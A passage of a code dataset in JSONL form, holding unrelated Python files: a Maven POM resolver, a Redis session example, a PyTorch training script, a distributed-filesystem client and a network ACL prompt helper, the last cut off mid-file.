+{"seq_id":"530371909","text":"\nimport bs4\nfrom bs4 import BeautifulSoup as bs\nfrom xml.dom.minidom import parse\n\n# Files created by us\nfrom Dependency import dependency\nfrom Resolve_Version import resolve_version\nfrom Resolve_GroupId import resolve_groupId\nfrom ProjectInfo import project\nfrom ParentInfo import parent\n\n\n\ndef get_deps_man_from_import_scope(main_pom_file, depm_fname, poms_base_dir, key, value, logf):\n\n\tdepm_path = poms_base_dir + depm_fname\n\n\ttry:\n\t\tdepm_tree = parse(depm_path)\n\texcept Exception as e:\n\t\tlogf.write(str(e) + \", -- Pom file %s does not exist when looked by the main pom file through dependencymanagement section --> %s.\\n\" %(depm_path, main_pom_file))\n\t\treturn\n\n\t# The main root to extract information\n\tdepm_root = bs(depm_tree.toxml(), 'lxml')\t\n\n\tproject_info = project(None, None, None)\n\n\tif depm_root.project.find_all('groupid', recursive=False):\n\t\troot_gid = depm_root.project.find_all('groupid', recursive=False)\n\t\tfor rid in root_gid:\n\t\t\tproject_info.set_groupId(rid.text)\n\n\n\tif depm_root.project.find_all('artifactid', recursive=False):\n\t\troot_aid = depm_root.project.find_all('artifactid', recursive=False)\n\t\tfor rid in root_aid:\n\t\t\tproject_info.set_artifactId(rid.text)\n\n\n\tif depm_root.project.find_all('version', recursive=False):\n\t\troot_vid = depm_root.project.find_all('version', recursive=False)\n\t\tfor rid in root_vid:\n\t\t\tproject_info.set_version(rid.text)\n\t\n\n\t# To keep parent information\n\tparent_info = parent(None, None, None, None)\n\thas_parent = False\n\n\t# if parent is not None:\n\tfor p in depm_root.project.find_all('parent', recursive=False):\n\t\tif type(p) == bs4.element.Tag:\t\n\t\t\thas_parent = True\n\t\t\tparent_info.set_groupId(p.find('groupid').text)\n\t\t\tparent_info.set_artifactId(p.find('artifactid').text)\n\t\t\tparent_info.set_version(p.find('version').text)\n\t\t\tparent_info.set_path(parent_info.get_groupId() + \"-\" + parent_info.get_artifactId() + \"-\" + parent_info.get_version() + \".pom\")\n\n\n\t# To handle if the project groupId and version not giving, then we use the parent groupId and version\t\n\tif project_info.get_groupId() is None:\n\t\tproject_info.set_groupId(parent_info.get_groupId())\n\tif project_info.get_version() is None:\n\t\tproject_info.set_version(parent_info.get_version())\t\n\n\n\tdepm_with_import_list = []\t\n\n\tdeps_manage = depm_root.project.find_all('dependencymanagement', recursive=False)\n\tif deps_manage: # Check if has dependency management section\n\t\tfor deps in deps_manage: # deps = dependecies\n\t\t\tif type(deps) ==bs4.element.Tag:\n\t\t\t\tfor dep in deps: # dep = dependency\n\t\t\t\t\tif type(dep) == bs4.element.Tag:\n\t\t\t\t\t\tfor d in dep:\n\t\t\t\t\t\t\tif type(d) == bs4.element.Tag:\n\n\t\t\t\t\t\t\t\tdepm = dependency(None, None, None, None)\n\n\t\t\t\t\t\t\t\tif d.find('groupid'):\n\t\t\t\t\t\t\t\t\tdepm.set_groupId(d.find('groupid').text)\n\t\t\t\t\t\t\t\tif d.find('artifactid'):\n\t\t\t\t\t\t\t\t\tdepm.set_artifactId(d.find('artifactid').text)\n\t\t\t\t\t\t\t\tif d.find('version'):\n\t\t\t\t\t\t\t\t\tdepm.set_version(d.find('version').text)\n\t\t\t\t\t\t\t\tif d.find('scope'):\n\t\t\t\t\t\t\t\t\tdepm.set_scope(d.find('scope').text)\n\n\t\t\t\t\t\t\t\tif depm.get_groupId()[0] == \"$\":\n\n\t\t\t\t\t\t\t\t\tdepm.set_groupId(resolve_groupId(depm_root, depm.get_groupId(), project_info.get_groupId(), parent_info.get_groupId()))\n\t\t\t\t\t\t\t\t\t\n\t\t\t\t\t\t\t\t\n\t\t\t\t\t\t\t\tif depm.get_groupId() == value['gid'] and depm.get_artifactId() == value['aid'] and depm.get_version()[0] == '$' and depm.get_scope() != 'import':\n\n\t\t\t\t\t\t\t\t\tdepm.set_version(resolve_version(depm_root, depm.get_version(), project_info.get_version(), parent_info.get_version()))\n\n\t\t\t\t\t\t\t\t\t\t\n\t\t\t\t\t\t\t\tif depm.get_groupId() == value['gid'] and depm.get_artifactId() == value['aid'] and depm.get_scope() != \"import\":\n\t\t\t\t\t\t\t\t\t\n\t\t\t\t\t\t\t\t\treturn depm.get_version()\n\n\t\t\t\t\t\t\t\tif depm.get_scope() == \"import\":\n\n\t\t\t\t\t\t\t\t\tif depm.get_version()[0] == '$':\n\n\t\t\t\t\t\t\t\t\t\tdepm.set_version(resolve_version(depm_root, depm.get_version(), project_info.get_version(), parent_info.get_version()))\n\t\t\t\t\t\t\t\t\t\n\t\t\t\t\t\t\t\t\tdepm_fname = depm.get_groupId() + \"-\" + depm.get_artifactId() + \"-\" + depm.get_version() + \".pom\"\t\n\t\t\t\t\t\t\t\t\tdepm_with_import_list.append(depm_fname)\t\t\n\n\n\tfor iter_ in range(len(depm_with_import_list)):\n\t\tcapture_ = get_deps_man_from_import_scope(main_pom_file, depm_with_import_list[iter_], poms_base_dir, key, value, logf)\t\t\t\t\t\t\t\n\t\tif capture_ == None:\n\t\t\tcontinue\n\t\telse:\n\t\t\treturn capture_\t\n\n\tif has_parent:\n\t\treturn get_deps_man_from_import_scope(main_pom_file, parent_info.get_path(), poms_base_dir, key, value, logf)\t\t\n","sub_path":"src/GetDepsFromDepmImport.py","file_name":"GetDepsFromDepmImport.py","file_ext":"py","file_size_in_byte":4393,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"453152369","text":"import redis\nimport time\nimport argparse\n\n\ndef main(args):\n conn = redis.Redis(host='localhost', port=6379, db=0)\n\n if args.action == 'check_token':\n token = check_token(conn, args.token)\n print(token)\n elif args.action == 'update_token':\n update_token(conn, args.token, args.user, args.item)\n elif args.action == 'clean_full_sessions':\n clean_full_sessions(conn)\n elif args.action == 'add_to_cart':\n add_to_cart(conn, args.token, args.item, int(args.count))\n else:\n print(\"we don't recognize the action\")\n\n\ndef check_token(conn, token):\n return conn.hget('login:', token)\n\n\ndef update_token(conn, token, user, item=None):\n timestamp = time.time()\n conn.hset('login:', token, user)\n conn.zadd('recent:', {token: timestamp})\n if item:\n conn.zadd('viewed:' + token, {item: timestamp})\n conn.zremrangebyrank('viewed:' + token, 0, -26)\n conn.zincrby('viewed:', item, -1)\n\nQUIT = False\nLIMIT = 10000000\n\n\ndef clean_full_sessions(conn):\n while not QUIT:\n size = conn.zcard('recent:')\n if size <= LIMIT:\n time.sleep(1)\n continue\n\n end_index = min(size - LIMIT, 100)\n tokens = conn.zrange('recent:', 0, end_index - 1)\n session_keys = []\n for token in tokens:\n session_keys.append('viewed:' + token)\n session_keys.append('cart:' + token)\n\n conn.delete(*session_keys)\n conn.hdel('login:', *tokens)\n conn.zrem('recent:', *tokens)\n\n\ndef add_to_cart(conn, token, item, count):\n if count <= 0:\n conn.hrem('cart:' + token, item)\n else:\n conn.hset('cart:' + token, item, count)\n\n\n# the example code provided by the book for the following function is incomplete, so it is not tested\ndef cache_request(conn, request, callback):\n if not can_cache(conn, request):\n return callback(request)\n page_key = 'cache:' + hash_request(request)\n content = conn.get(page_key)\n if not content:\n content = callback(request)\n conn.setex(page_key, content, 300)\n return content\n\n\ndef schedule_row_cache(conn, row_id, delay):\n conn.zadd('delay:', row_id, delay)\n conn.zadd('schedule:', row_id, time.time())\n\n\ndef cache_rows(conn):\n while not QUIT:\n next = conn.zrange('schedule:', 0, 0, withscores=True)\n now = time.time()\n if not next or next[0][1] > now:\n time.sleep(.05)\n continue\n row_id = next[0][0]\n delay = conn.zscore('delay:', row_id)\n if delay <= 0:\n conn.zrem('delay:', row_id)\n conn.zrem('schedule:', row_id)\n conn.delete('inv:' + row_id)\n continue\n row = Inventory.get(row_id)\n conn.zadd('schedule:', row_id, now + delay)\n conn.set('inv:' + row_id, json.dumps(row.to_dict()))\n\n\nif __name__ == \"__main__\":\n parser = argparse.ArgumentParser(description='Python Redis Test')\n parser.add_argument('action')\n parser.add_argument('--token')\n parser.add_argument('--user')\n parser.add_argument('--item')\n parser.add_argument('--count')\n\n args = parser.parse_args()\n\n main(args)\n\n\"\"\"\npython3 src/web_application.py check_token --token token:1\npython3 src/web_application.py update_token --token token:1 --user user:1 --item item:1\npython3 src/web_application.py clean_full_sessions\npython3 src/web_application.py add_to_cart --token token:1 --item item:1 --count 10\n\"\"\"\n","sub_path":"src/web_application.py","file_name":"web_application.py","file_ext":"py","file_size_in_byte":3463,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"461373580","text":"import argparse\nfrom os import path\nimport numpy as np\nimport pandas as pd\nimport pkg_resources\n\nimport msac\n\n\ndef main():\n p = {}\n\n parser = argparse.ArgumentParser(description='Calculates the m/z of potential adducts for a given compound m/z')\n parser.add_argument('-v', '--version', action='version', version=msac.__version__, help='print version and exit')\n\n parser.add_argument('input_masses', help=\".csv with 'mass' column\")\n parser.add_argument('-f', '--adduct_file', help=\"path to a .csv with an 'adduct' col and a 'charge' col. Defaults to 'example_data/adduct_list.csv' \")\n parser.add_argument('-o', '--outname', help='an output filename (.csv) for the calculated adducts')\n parser.add_argument('-m', '--mass_col', default='mass', type=str, help=\"if the mass column isn't called 'mass'\")\n\n args = parser.parse_args()\n\n # calculate adduct mz\n if args.adduct_file:\n df = msac.calculate_adduct_mz.calculate_adduct_mz(args.adduct_file)\n else:\n ADDUCT_FILE = pkg_resources.resource_filename('msac',\n 'example_data/adduct_list.csv')\n df = msac.calculate_adduct_mz.calculate_adduct_mz(ADDUCT_FILE)\n\n # calculate input mass mz for each adduct and add adduct mz\n output = msac.calculate_input_mz.calculate_all_mz(df, args.input_masses,\n args.mass_col)\n\n if args.outname:\n output_name = args.outname\n else:\n inname, ext = path.splitext(args.input_masses)\n output_name = inname + '_adducts.csv'\n output.to_csv(output_name, index=False)\n","sub_path":"msac/cli.py","file_name":"cli.py","file_ext":"py","file_size_in_byte":1631,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"490054280","text":"# Copyright 2016 Google Inc. All Rights Reserved.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\n\"\"\"Interface for job providers.\"\"\"\n\nfrom . import google\nfrom . import local\nfrom . import test_fails\n\n\ndef get_provider(args):\n \"\"\"Returns a provider for job submission requests.\"\"\"\n\n provider = getattr(args, 'provider', 'google')\n\n if provider == 'google':\n return google.GoogleJobProvider(\n getattr(args, 'verbose', False),\n getattr(args, 'dry_run', False), args.project)\n elif provider == 'local':\n return local.LocalJobProvider()\n elif provider == 'test-fails':\n return test_fails.FailsJobProvider()\n else:\n raise ValueError('Unknown provider: ' + provider)\n\n\ndef add_provider_argument(parser):\n parser.add_argument(\n '--provider',\n default='google',\n choices=['local', 'google', 'test-fails'],\n help=\"\"\"Job service provider. Valid values are \"google\" (Google's\n Pipeline API) and \"local\" (local Docker execution). \"test-*\" providers\n are for testing purposes only.\"\"\",\n metavar='PROVIDER')\n\n\ndef get_dstat_provider_args(args):\n \"\"\"A string with the arguments to point dstat to the same provider+project.\"\"\"\n if args.provider == 'google':\n return ' --project %s' % args.project\n elif args.provider == 'local':\n return ' --provider local'\n elif args.provider == 'test-fails':\n return ''\n # New providers should add their dstat required arguments here.\n assert False\n return ''\n\n\ndef get_ddel_provider_args(args):\n \"\"\"A string with the arguments to point ddel to the same provider+project.\"\"\"\n # Change this if the two ever diverge.\n return get_dstat_provider_args(args)\n\n\ndef check_for_unsupported_flag(args):\n \"\"\"Raise an error if the provider doesn't support a provided flag.\"\"\"\n if args.label and args.provider not in ['test-fails', 'local', 'google']:\n raise ValueError(\n '--label is not supported by the \"%s\" provider.' % args.provider)\n\n\nif __name__ == '__main__':\n pass\n","sub_path":"dsub/providers/provider_base.py","file_name":"provider_base.py","file_ext":"py","file_size_in_byte":2482,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"218034923","text":"import random\r\nimport numpy as np\r\nimport pickle\r\nfrom functions.nn import NeuralNetwork\r\nimport torch\r\nfrom torch import nn\r\nimport pandas as pd\r\nimport torch.utils.data as data_utils\r\nimport torchmetrics\r\nfrom torch.utils.tensorboard import SummaryWriter\r\nfrom torchinfo import summary\r\n\r\n# Script to train the neural network using datasets from files\r\n\r\n# Set random seed\r\nnp.random.seed(0)\r\nrandom.seed(0)\r\n\r\n# Get cpu or gpu device for training.\r\ndevice = \"cuda\" if torch.cuda.is_available() else \"cpu\"\r\nprint(\"Using {} device\".format(device))\r\n\r\n# Set Neural Network parameters, Create an instance of NeuralNetwork, and move it to the device\r\nlearning_rate = 1e-4\r\n#base_lr = 1e-5\r\nepochs = 60\r\nbatch_size = 128\r\nshuffle = True\r\nn_layers = 4\r\nmodel = NeuralNetwork().to(device)\r\nloss_fn = nn.BCELoss()\r\noptimizer = torch.optim.Adam(model.parameters(), lr=learning_rate)\r\n#scheduler = torch.optim.lr_scheduler.CyclicLR(optimizer, base_lr, learning_rate, cycle_momentum=False)\r\n#scheduler = torch.optim.lr_scheduler.StepLR(optimizer, step_size=15, gamma=0.1)\r\n\r\n# Open tensorboard\r\nwriter = SummaryWriter(\r\n log_dir='runs/TEST FINAL 2 - Lr{} - Batch{} - {}layers - leakyrelu'.format(learning_rate, batch_size, n_layers))\r\n\r\n# Print the model\r\nsummary(model, input_size=(1, 1030))\r\n\r\n# Detect anomaly\r\n# torch.autograd.set_detect_anomaly(True)\r\n\r\n\r\n# -------------------------------------------------------------------------------------------------\r\n# Prepare the datasets with all scenes\r\n# -------------------------------------------------------------------------------------------------\r\n\r\n# Select training scenes\r\nkitchens = [f\"FloorPlan{i}\" for i in range(1, 20)]\r\nliving_rooms = [f\"FloorPlan{200 + i}\" for i in range(1, 20)]\r\nbedrooms = [f\"FloorPlan{300 + i}\" for i in range(1, 20)]\r\nbathrooms = [f\"FloorPlan{400 + i}\" for i in range(1, 20)]\r\ntrain_scenes = kitchens + living_rooms + bedrooms + bathrooms\r\n\r\n# Select validation scenes\r\nkitchens = [f\"FloorPlan{i}\" for i in range(20, 26)]\r\nliving_rooms = [f\"FloorPlan{200 + i}\" for i in range(20, 26)]\r\nbedrooms = [f\"FloorPlan{300 + i}\" for i in range(20, 26)]\r\nbathrooms = [f\"FloorPlan{400 + i}\" for i in range(20, 26)]\r\nval_scenes = kitchens + living_rooms + bedrooms + bathrooms\r\n\r\n# Select testing scenes\r\nkitchens = [f\"FloorPlan{i}\" for i in range(26, 31)]\r\nliving_rooms = [f\"FloorPlan{200 + i}\" for i in range(26, 31)]\r\nbedrooms = [f\"FloorPlan{300 + i}\" for i in range(26, 31)]\r\nbathrooms = [f\"FloorPlan{400 + i}\" for i in range(26, 31)]\r\ntest_scenes = kitchens + living_rooms + bedrooms + bathrooms\r\n\r\n# Create dataset with all scenes dataframes\r\nall_scenes = pd.DataFrame()\r\nfor scene in train_scenes:\r\n with open('preprocessed_dataset2/prep_dataset_{}.pkl'.format(scene), \"rb\") as input_file:\r\n preprocessed_dataframe = pickle.load(input_file)\r\n all_scenes = pd.concat([all_scenes, preprocessed_dataframe], ignore_index=True)\r\n del preprocessed_dataframe\r\n\r\n# Separate target variable from rest of dataframe\r\ntarget = pd.DataFrame(all_scenes.iloc[:, -1])\r\ndataframe = all_scenes.drop(columns=all_scenes.columns[-1], axis=1)\r\n\r\n# Load dataset in pytorch\r\ntrain = data_utils.TensorDataset(torch.Tensor(np.array(dataframe)), torch.Tensor(np.array(target)))\r\ntrain_loader = data_utils.DataLoader(train, batch_size=batch_size, shuffle=shuffle)\r\nsize_train = len(train)\r\nprint(target.value_counts())\r\n\r\nprint(\"Training set loaded\")\r\n\r\n# Create dataset with all validation or testing scenes dataframes\r\nall_scenes_test = pd.DataFrame()\r\nfor scene in test_scenes:\r\n with open(\"preprocessed_dataset2/prep_dataset_{}.pkl\".format(scene), \"rb\") as input_file:\r\n preprocessed_dataframe = pickle.load(input_file)\r\n all_scenes_test = pd.concat([all_scenes_test, preprocessed_dataframe], ignore_index=True)\r\n del preprocessed_dataframe\r\n\r\n# Separate target variable from rest of dataframe\r\ntest_target = pd.DataFrame(all_scenes_test.iloc[:, -1])\r\ntest_dataframe = all_scenes_test.drop(columns=all_scenes_test.columns[-1], axis=1)\r\nprint(test_target.value_counts())\r\n\r\n# Load dataset in pytorch\r\ntest = data_utils.TensorDataset(torch.Tensor(np.array(test_dataframe)), torch.Tensor(np.array(test_target)))\r\ntest_loader = data_utils.DataLoader(test, batch_size=batch_size, shuffle=shuffle)\r\nsize_test = len(test)\r\n\r\n# print(test_target.value_counts())\r\nprint(\"Test set loaded\")\r\n\r\n# -------------------------------------------------------------------------------------------------\r\n# Initialize metrics\r\n# -------------------------------------------------------------------------------------------------\r\n\r\n# Initialize metrics with torchmetrics\r\ntrain_accuracy = torchmetrics.Accuracy().to(device)\r\ntrain_precision = torchmetrics.Precision().to(device)\r\ntrain_recall = torchmetrics.Recall().to(device)\r\ntest_accuracy = torchmetrics.Accuracy().to(device)\r\ntest_precision = torchmetrics.Precision().to(device)\r\ntest_recall = torchmetrics.Recall().to(device)\r\n\r\n# -------------------------------------------------------------------------------------------------\r\n# Train network for n epochs\r\n# -------------------------------------------------------------------------------------------------\r\nfor epoch in range(epochs):\r\n\r\n # Switch model to training mode. This is necessary for layers like dropout, batchnorm etc\r\n # which behave differently in training and evaluation mode\r\n model.train()\r\n print(\"Training Epoch \", epoch + 1)\r\n\r\n # Reset metrics calculators to prepare for new epoch\r\n running_loss = 0.0\r\n train_accuracy.reset()\r\n train_precision.reset()\r\n train_recall.reset()\r\n\r\n # Train\r\n for i, data in enumerate(train_loader, 0):\r\n # get the inputs; data is a list of [inputs, labels]\r\n inputs, labels = data\r\n inputs = inputs.to(device)\r\n labels = labels.to(device)\r\n\r\n # zero the parameter gradients\r\n optimizer.zero_grad()\r\n\r\n # forward + backward + optimize\r\n outputs = model(inputs)\r\n loss = loss_fn(outputs, labels)\r\n loss.backward()\r\n optimizer.step()\r\n\r\n # Update metrics\r\n train_accuracy.update(outputs, labels.int())\r\n train_precision.update(outputs, labels.int())\r\n train_recall.update(outputs, labels.int())\r\n running_loss += loss.item() * inputs.size(0)\r\n\r\n\r\n\r\n # Add weight graphs to tensorboard\r\n writer.add_graph(model, inputs)\r\n for name, weight in model.named_parameters():\r\n writer.add_histogram(name, weight, epoch)\r\n# writer.add_histogram(f'{name}.grad', weight.grad, epoch)\r\n\r\n # Compute metrics for the current epoch\r\n acc = train_accuracy.compute()\r\n pre = train_precision.compute()\r\n rec = train_recall.compute()\r\n epoch_loss = running_loss / size_train\r\n\r\n # Add values to tensorboard\r\n writer.add_scalar(\"Train/Accuracy\", acc.item(), epoch)\r\n writer.add_scalar(\"Train/Precision\", pre.item(), epoch)\r\n writer.add_scalar(\"Train/Recall\", rec.item(), epoch)\r\n writer.add_scalar(\"Train/Loss\", epoch_loss, epoch)\r\n\r\n # -------------------------------------------------------------------------------------------\r\n # Testing phase\r\n # -------------------------------------------------------------------------------------------\r\n\r\n # Switch model to evaluation mode.\r\n model.eval()\r\n print(\"Testing...\")\r\n\r\n # Reset metrics calculators to prepare for new iteration\r\n running_loss = 0.0\r\n test_accuracy.reset()\r\n test_precision.reset()\r\n test_recall.reset()\r\n\r\n with torch.no_grad():\r\n for data in test_loader:\r\n images, labels = data\r\n images = images.to(device)\r\n labels = labels.to(device)\r\n\r\n size = labels.size(0)\r\n outputs = model(images)\r\n predicted = outputs > 0.5 # tensor of true/false\r\n loss = loss_fn(outputs, labels)\r\n\r\n # Update metrics\r\n test_accuracy.update(outputs, labels.int())\r\n test_precision.update(outputs, labels.int())\r\n test_recall.update(outputs, labels.int())\r\n running_loss += loss.item() * images.size(0)\r\n\r\n # Compute and store metrics in lists for the current iteration\r\n acc = test_accuracy.compute()\r\n pre = test_precision.compute()\r\n rec = test_recall.compute()\r\n epoch_loss = running_loss / size_test\r\n\r\n # Add values to tensorboard\r\n writer.add_scalar(\"Test/Accuracy\", acc.item(), epoch)\r\n writer.add_scalar(\"Test/Precision\", pre.item(), epoch)\r\n writer.add_scalar(\"Test/Recall\", rec.item(), epoch)\r\n writer.add_scalar(\"Test/Loss\", epoch_loss, epoch)\r\n\r\n # Scheduler step\r\n #scheduler.step()\r\n\r\n\r\n\r\n# Record hyper-parameters (with final metrics)\r\nwriter.add_hparams(hparam_dict={\"Learning Rate\": learning_rate, \"Batch Size\": batch_size, \"Shuffle\": shuffle,\r\n \"Num Layers\": n_layers},\r\n metric_dict={\"accuracy\": acc, \"precision\": pre, \"recall\": rec, \"loss\": epoch_loss})\r\n\r\n# Save final model\r\nPATH = './nn/final_nn_ALL.pth'\r\ntorch.save(model.state_dict(), PATH)\r\n\r\n# Close tensorboard\r\nwriter.flush()\r\nwriter.close()\r\n","sub_path":"train.py","file_name":"train.py","file_ext":"py","file_size_in_byte":9163,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"622148205","text":"import os\nimport uuid ### DO NOT DELETE !!!\nimport rpyc\nimport toml\nfrom model import FileMetaData\n\nRPYC_CONFIG = toml.load(\"config.toml\")[\"rpyc\"]\n\nlocal_cache = {}\n\n\ndef query_from_server(query):\n print(query, end=\"\")\n ans = input()\n if ans == 'y' or ans == 'Y':\n return True\n else:\n return False\n # return True\n\n\ndef send_to_minion(block_uuid, data, minion_ip, minion_port):\n con = rpyc.connect(minion_ip, minion_port, config=RPYC_CONFIG)\n minion = con.root.Minion()\n minion.put(block_uuid, data)\n\n\ndef read_from_minion(block_uuid, minion_ip, minion_port):\n con = rpyc.connect(minion_ip, port=minion_port, config=RPYC_CONFIG)\n minion = con.root.Minion()\n return minion.get(block_uuid)\n\n\ndef get(master, f_name, local_path):\n if f_name in local_cache:\n r_file_table, update, timestamp = master.get_file_table_entry(f_name, local_cache[f_name].time_stamp)\n else:\n r_file_table, update, timestamp = master.get_file_table_entry(f_name)\n if update:\n local_cache[f_name] = FileMetaData(f_name, r_file_table, timestamp)\n file_table = r_file_table\n else:\n file_table = local_cache[f_name].blocks\n\n if not file_table:\n print(\"File not found, please check your input\")\n return\n main_minions = master.get_minions()\n port = master.get_minion_port()\n with open(local_path, 'wb') as f:\n for block in file_table:\n block_uuid, gid = block\n data = read_from_minion(block_uuid, main_minions[gid], port)\n f.write(data)\n master.read_finished(f_name)\n\n\ndef put(master, source, destination):\n if not os.path.isfile(source):\n print(\"The path \\'%s\\' is not a file or does not exist!\" % source)\n return\n if not os.access(source, os.R_OK):\n print(\"Permission denied. You do not have the read access to the \\'%s\\'\" % source)\n return\n size = os.path.getsize(source)\n blocks, timestamp, main_minions = master.write(destination, size, query_from_server)\n local_cache[destination] = FileMetaData(destination, blocks, timestamp)\n block_size = master.get_block_size()\n port = master.get_minion_port()\n with open(source, 'rb') as f:\n for b in blocks:\n data = f.read(block_size)\n block_uuid, gid = b\n send_to_minion(block_uuid, data, main_minions[gid], port)\n master.write_finished(destination)\n\n\ndef delete(master, dest):\n master.delete(dest)\n\n\ndef ls(master):\n file_list = master.get_list()\n if len(file_list) == 0:\n print(\"No file.\")\n return\n for f in file_list:\n print(f)\n\n\ndef print_usage():\n print(\"Usage:\")\n print(\"1. View files in the distributed filesystem:\")\n print(\" Command: ls\")\n print(\"2. Put local file in the distributed filesystem:\")\n print(\" Command: put \")\n print(\"3. Get file from the distributed filesystem:\")\n print(\" Command: get \")\n print(\"4. Delete file in the distributed filesystem:\")\n print(\" Command: del \")\n print(\"\\nType \\'exit\\' to exit FinalDFS client.\")\n\n\ndef print_hello():\n print(\"Welcome to FinalDFS Client V1.0!\")\n\n\ndef main():\n MASTER_IP = \"localhost\"\n MASTER_PORT = 2131\n con = rpyc.connect(MASTER_IP, port=MASTER_PORT, config=RPYC_CONFIG)\n print(\"Connected to master@%s:%d.\" % (MASTER_IP, MASTER_PORT))\n master = con.root.Master()\n print_hello()\n print_usage()\n while True:\n print(\">>> \", end=\"\")\n whole_command = input().split(\" \")\n\n main_command = whole_command[0]\n\n if main_command == '':\n continue\n\n if main_command == \"get\":\n if len(whole_command) < 3:\n print(\"** Command: get \")\n continue\n get(master, whole_command[1], whole_command[2])\n elif main_command == \"put\":\n if len(whole_command) < 3:\n print(\"** Command: put \")\n continue\n put(master, whole_command[1], whole_command[2])\n elif main_command == \"del\":\n if len(whole_command) < 2:\n print(\"** Command: Command: del \")\n continue\n delete(master, whole_command[1])\n elif main_command == \"ls\":\n ls(master)\n elif main_command == \"exit\":\n exit(0)\n else:\n print(\"Unrecognized command, please retry.\")\n\n\nif __name__ == \"__main__\":\n main()\n","sub_path":"src/client.py","file_name":"client.py","file_ext":"py","file_size_in_byte":4618,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"307822312","text":"#pylint: disable=C0301, W0201\nimport Checks\n\nclass General_Questions():\n \"\"\"\n A class of the various questions needed for an ACL. Maybe doesn't need to be a class at all?\n \"\"\"\n\n check = Checks.network_checks()\n valid_input = False\n #Variables of strings used modularly in the below questions. May need to be changed to dicts as we work on multiple types of routers\n POLITE_STRING = \"Please specify a \"\n INVALID_STRING = \" is invalid. Specify a valid \"\n DEVICE_STRINGS = {\n 'general' : 'platform, aclatel (a), cisco (c), or juniper (j): ',\n 'invalid' : 'platform using a, c, or j: '\n }\n NAME_STRINGS = {\n 'descriptor': ' (use _ for spaces): ',\n 'entry' : 'description for this entry, using underscores (_) for spaces and less than 20 characters: ',\n 'filter' : 'description for this filter, using underscores (_) for spaces and less than 20 characters: ',\n 'number' : 'number for this filter: '\n }\n\n PROTOCOL_STRINGS = {\n 'general': 'protocol or [any]: ',\n 'invalid' : 'protocol (tcp, udp, icmp, gre, esp) or [any]: '\n }\n IP_STRINGS = [\n \" IP/CIDR or [any]. You can also provide multiple IP/CIDRs, seperated by a comma: \",\n \" IP/CIDR in the form of #.#.#.#/# or [any]. Multiple IP/CIDRs must ALL be correclty formatted, or they will be rejected: \"\n ]\n PORT_STRINGS = [\n \" port or [any]: \",\n \" port between 1-65535 or [any]: \"\n ]\n ACTION_STRINGS = {\n 'general': 'action, forward/[drop]: ',\n 'alcatel' : 'drop',\n 'juniper' : \"reject\"\n }\n NEW_TERM_STRINGS = {\n 'general' : 'Do you need another term? y/[n]: ',\n 'invalid' : 'input, y/[n]: '\n }\n\n\n\n\n #Methods for each type of information we need to query. There is almost certaintly a way to combine all of these into one function that requires more inputs, but this is easier for now)\n #Each method follows the same general logic: Ask for input, call the appropriate checking function in Checks.network_checks, and ask the user again if the check returns false\n\n\n def q_name(self, kind):\n \"\"\"\n Ask for various types of names. Types accepted:\n 'filter', 'entry', 'number'\n \"\"\"\n self.name = input(self.POLITE_STRING + self.NAME_STRINGS[kind])\n\n self.is_true = self.check.space_check(self.name)\n self.length = self.check.length_check(self.name)\n self.valid_input = False\n\n while self.valid_input is False:\n if self.is_true is True and self.length is True:\n return self.name\n else:\n self.name = input(str(self.name) + self.INVALID_STRING + self.NAME_STRINGS[kind])\n if self.NAME_STRINGS[kind] == \"number\":\n self.is_true = self.check.service_check(self.name)\n else:\n self.is_true = self.check.space_check(self.name)\n self.length = self.check.length_check(self.name)\n\n def q_ip(self, kind):\n \"\"\"\n Ask for a source or destination ip. Kinds accepted:\n 'source, 'destination'\n \"\"\"\n self.ip_addr = input(self.POLITE_STRING + str(kind) + self.IP_STRINGS[0]) or \"any\"\n self.ip_addr = self.ip_addr.replace(' ', '')\n self.ip_addr = self.ip_addr.split(',')\n self.is_true = self.check.ip_check(self.ip_addr)\n self.valid_input = False\n\n while self.valid_input is False:\n if self.is_true is True:\n return self.ip_addr\n else:\n self.ip_addr = input(str(self.ip_addr) + self.INVALID_STRING + str(kind) + self.IP_STRINGS[1]) or \"any\"\n self.ip_addr = self.ip_addr.replace(' ', '')\n self.ip_addr = self.ip_addr.split(',')\n self.is_true = self.check.ip_check(self.ip_addr)\n\n\n def q_port(self, kind):\n \"\"\"\n Ask for a source or destination port. Kinds accepted:\n 'source, 'destination'\n \"\"\"\n\n self.service = input(self.POLITE_STRING + str(kind) + self.PORT_STRINGS[0]) or \"any\"\n self.service = self.service.replace(' ', '')\n self.service = self.service.split(',')\n self.is_true = self.check.service_check(self.service)\n self.valid_input = False\n\n while self.valid_input is False:\n if self.is_true is True:\n return self.service\n else:\n self.service = input(str(self.service) + self.INVALID_STRING + str(kind) + self.PORT_STRINGS[1]) or \"any\"\n self.is_true = self.check.service_check(self.service)\n\n def q_protocol(self):\n \"\"\"Ask for a protocol. Accepts no arguments\"\"\"\n self.protocol = input(self.POLITE_STRING + self.PROTOCOL_STRINGS['general']) or \"any\"\n self.is_true = self.check.key_word_check(self.protocol, \"protocol\")\n self.valid_input = False\n\n while self.valid_input is False:\n if self.is_true is True:\n return self.protocol\n else:\n self.protocol = input(str(self.protocol) + self.INVALID_STRING + self.PROTOCOL_STRINGS['invalid']) or \"any\"\n self.is_true = self.check.key_word_check(self.protocol, \"protocol\")\n\n\n def q_action(self, kind):\n \"\"\"Ask for an action. Kind currently doesn't matter\"\"\"\n self.action = input(self.POLITE_STRING + str(self.ACTION_STRINGS['general'])) or self.ACTION_STRINGS[kind]\n self.is_true = self.check.key_word_check(self.action, \"action\")\n self.valid_input = False\n\n while self.valid_input is False:\n if self.is_true is True:\n return self.action\n else:\n self.action = input(str(self.action) + self.INVALID_STRING + 